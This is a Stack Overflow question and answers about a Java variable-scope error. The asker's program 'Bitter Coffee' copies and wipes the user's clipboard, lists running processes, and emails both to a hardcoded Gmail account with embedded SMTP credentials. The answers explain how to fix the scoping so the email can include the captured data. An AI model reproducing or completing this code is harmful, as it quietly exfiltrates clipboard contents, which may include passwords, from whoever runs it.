# Variables cannot be resolved

Tags: java, eclipse

I am making my first Java program (In hopes to master it in the next century) and have ran into some issues. When I try to create a string with a combination of text and previously created strings, Eclipse says the variables cannot be resolved. Could somebody please help me? Thanks!

```
//Clipboard
import java.awt.Toolkit;
import java.awt.datatransfer.DataFlavor;
import java.awt.datatransfer.StringSelection;
import java.awt.datatransfer.Transferable;
//Taskmanager
import java.io.BufferedReader;
import java.io.InputStreamReader;
//Email-er
import java.util.Properties;
import javax.mail.Message;
import javax.mail.MessagingException;
import javax.mail.Session;
import javax.mail.Transport;
import javax.mail.internet.AddressException;
import javax.mail.internet.InternetAddress;
import javax.mail.internet.MimeMessage;
/*
* Program created by Silver (CEO of Idrees Inc) for theoretical and educational purposes only
* No data received from this app is used for any other purpose except the ones above
* Do NOT use this for any purposes other than the conditions above (Including the recording or saving of any data obtained with this program)
* You may NOT distribute, copy, or modify this program without the express permission of Silver (idrees@idreesinc.com)
* Silver is NOT responsible for any damages, physical or virtual, caused by this program
* Clipboard and Task-list checkers based off programs by csanuragjain (http://www.codeproject.com/Members/csanuragjain)
* SMTP email with Gmail created by Arpit Shah (Founder of Crunchify.com [crunchify.com/about])
* Copyright IdreesInc.com  All rights reserved
*/
public class Application {
     static Properties mailServerProperties;
     static Session getMailSession;
     static MimeMessage generateMailMessage;
     public static void main(String args[]) throws AddressException, MessagingException {
            generateAndSendEmail();
            System.out.println("\n\n ===> Your Java Program has just sent an Email successfully. Check your email..");
        }

        public static void generateAndSendEmail() throws AddressException, MessagingException {     

            boolean allowEmails = false;
         Transferable t = Toolkit.getDefaultToolkit().getSystemClipboard().getContents(null);

            try {
                if (t != null && t.isDataFlavorSupported(DataFlavor.stringFlavor)) {
                    String text = (String)t.getTransferData(DataFlavor.stringFlavor);
                    String data = text;
                    System.out.println("Current clipboard data:\n"+data); //Prints Clipboard data
                    text=""; //String is now empty
                    StringSelection ss = new StringSelection(text); //Clears Clipboard data
                    Toolkit.getDefaultToolkit().getSystemClipboard().setContents(ss, null);
                    System.out.println("Clipboard data wiped successfully" + text); //Displays "text" string after output for debugging

                }
            }
            catch(Exception e)
            {

        }
            try {
                String line;
                Process p = Runtime.getRuntime().exec("tasklist.exe"); //Accesses running task-list
                BufferedReader input =
                        new BufferedReader(new InputStreamReader(p.getInputStream()));
                while ((line = input.readLine()) != null) {
                    System.out.println(line); //Data is parsed
                }
                input.close();

            } catch (Exception err) {
                err.printStackTrace();
            }

    if(allowEmails == true) {

    //Step1   
            System.out.println("\n\n 1st ===> setup Mail Server Properties..");
            mailServerProperties = System.getProperties();
            mailServerProperties.put("mail.smtp.port", "587");
            mailServerProperties.put("mail.smtp.auth", "true");
            mailServerProperties.put("mail.smtp.starttls.enable", "true");
            System.out.println("Mail Server Properties have been setup successfully..");

    //Step2        
            System.out.println("\n\n 2nd ===> get Mail Session..");
            getMailSession = Session.getDefaultInstance(mailServerProperties, null);
            generateMailMessage = new MimeMessage(getMailSession);
            generateMailMessage.addRecipient(Message.RecipientType.TO, new InternetAddress("javasmtpserver@gmail.com"));
            generateMailMessage.setSubject("Application 'Bitter Coffee' Has Been Activated");
            String emailBody = "Application 'Bitter Coffee' has been activated and has ran successfully" + "<br><br>The activators information is as follows: " + "<br>Clipboard Data: " + data + "<br>Active Tasks: " + input + "<br><br>Program created by Silver (CEO of Idrees Inc) for theoretical and educational purposes only<br>No data received from this app is used for any other purpose except the ones above<br>Do NOT use this for any purposes other than the conditions above (Including the recording or saving of any data obtained with this program)<br>You may NOT distribute, copy, or modify this program without the express permission of Silver (idrees@idreesinc.com)<br>I am not responsible for any damages, physical or virtual, caused by this program<br>Clipboard and Task-list checkers based off programs by csanuragjain (http://www.codeproject.com/Members/csanuragjain)<br>SMTP email with Gmail created by Arpit Shah (Founder of Crunchify.com [crunchify.com/about])<br><br>Copyright IdreesInc.com  All rights reserved";
            generateMailMessage.setContent(emailBody, "text/html");
            System.out.println("Mail Session has been created successfully..");

    //Step3        
            System.out.println("\n\n 3rd ===> Get Session and Send mail");
            Transport transport = getMailSession.getTransport("smtp");
            // Enter your correct Gmail UserID and Password
            transport.connect("smtp.gmail.com", "javasmtpserver", "serverpassword");
            transport.sendMessage(generateMailMessage, generateMailMessage.getAllRecipients());
            transport.close();
    }
        }

}
```

Postscript: This is my first Stack Overflow post so correct me if I mess anything up. I have looked everywhere for the answer to my problem before I posted. And I am sure this is an easy to fix problem but as this is my first project in Java I am lost. Thanks again everyone and happy coding!

Post-Postscript: This code was created as a little project for me. Don't worry, I wont use it for any nefarious needs ;)

EDIT: Dumb me forgot to give the full errors :)
They are: "input cannot be resolved as a variable"
"data cannot be resolved as a variable"

They are the 6th line on "Step 2"
Thanks again!

Comment: Welcome to SO. Please post the full error you get.

Comment: It's not clear which variable(s) are not resolved?

Comment: which are the variable that says .. they cannot be resolved

Comment: Did you add jar to build path?

Comment: Please post the full error so we can narrow it down.

Comment: Sorry mates just fixed! I cant believe I forgot that; Must be the late nights..

Comment: @Ruchira yes, I have added the jar to the build

Comment: http://www.oracle.com/technetwork/java/javamail/index.html

Answer (score 6, accepted):

In Java you can only use a variable in the block in which it's defined.

You declare the variables `data` and `input` inside your try block.

This means you can only use them inside that block.

If you want to use `data` and `input` in step 2, you should declare them *before* your try block.

---

To fix it, do something like this:

```
public class Application {

    public static main(String[] args) {

        String data = null;
        String commandOutput = "";
        BufferedReader input = null;

        try {
            // do stuff
            data = text;
            input = // initialize buffered reader
            String line = input.readLine();
            while (line != null) {
                commandOutput += line;
                line = input.readLine();
            }
        }
        catch (SomeSpecificException ex) {
            // please handle exceptions!
        }
        catch (IOException ioex) {
            // handle IO Exceptions here
        }
        finally {               
            try {
                input.close();
            }
            catch (Exception ex) {
                ex.printStackTrace();
            }
        }
        .
        .
        .
        String emailBody = "blah blah " + data + " blah blah " + commandOutput;
    }
}
```

Comment: ^ This, and the same goes for **input**!

Comment: Gotcha... I was pretty proud I found either of them in all that code!

Comment: Took me a while to catch that one, +1 for the quick eye.

Comment: Thanks! And I am too, I realized my mistake too late when it came to posting all that code at once without saying anything about the errors location. So I tried to declare the variables beforehand as you said but I seem to keep getting the same error but in the try block also. How would you propose I accomplish your solution. Sorry about my noob-ness :)

Comment: @IdreesTheWicked - I edited my answer to show a vague outline of where you could declare your variables.  **Note:** In your code you attempt to treat `input` as a String (even though it's a BufferedReader).  That isn't going to work the way you want it to.  You should probably store the contents of your stream in a String variable.

Comment: Everything went smoothly except for the bufferedreader to string conversion. Any idea on how to do that?

Comment: Seriously I am going to bookmark this just so I can vote you up when I get to a rep of 15. You deserve about 50 after helping a dummy like me ;)

Comment: No worries at all.  Nobody is dumb if they don't know things they haven't been exposed to.  I applaud the effort you put into your first SO question and am glad I could help :-)

Comment: @IdreesTheWicked - I tried to provide a little guidance on how you might use your BufferedReader to _build_ a String that you can use later.  I iterate over the lines in your BufferedReader and store them in a String named `commandOutput`.

Comment: It worked! Thanks so much for your help with my first program! Now time to figure out WHY it worked ;)

Comment: Mad props on the effort you've shown in your first question!  The fact that you've shown interest to _learn_ and understand _why_ tells me you have a bright future writing programs :-) So many people around here don't care why... They just want copy/paste answers.  Those folks aren't going anywhere...

Answer (score 1):

In this line

```
String emailBody = "Application 'Bitter Coffee' has been activated and has ran successfully" + "<br><br>The activators information is as follows: " + "<br>Clipboard Data: " + data + "<br>Active Tasks: " + input + "<br><br>Program created by Silver (CEO of Idrees Inc) for theoretical and educational purposes only<br>No data received from this app is used for any other purpose except the ones above<br>Do NOT use this for any purposes other than the conditions above (Including the recording or saving of any data obtained with this program)<br>You may NOT distribute, copy, or modify this program without the express permission of Silver (idrees@idreesinc.com)<br>I am not responsible for any damages, physical or virtual, caused by this program<br>Clipboard and Task-list checkers based off programs by csanuragjain (http://www.codeproject.com/Members/csanuragjain)<br>SMTP email with Gmail created by Arpit Shah (Founder of Crunchify.com [crunchify.com/about])<br><br>Copyright IdreesInc.com  All rights reserved";
```

The variable `data` ,  `input`  are out of scope,  declare them as instance variables and use it

like

```
public class Application {
     private static String input;
     private static String data;
```

Please prefer to read  :[Java language specification on blocks](http://docs.oracle.com/javase/specs/jls/se7/html/jls-14.html#jls-14.2)

Comment: Sorry, but that won't work since he is calling a static method (**generateAndSendEmail**)!

Comment: @AKDADEVIL Nice catch.Thanks. Yes edited my post with static :)

Answer (score 0):

The variables `data` and `input` which you've used in the String `emailBody` is no where declared and intilized.

also

```
 if(allowEmails) {
 }
```

is enough rather than

```
if(allowEmails == true)
```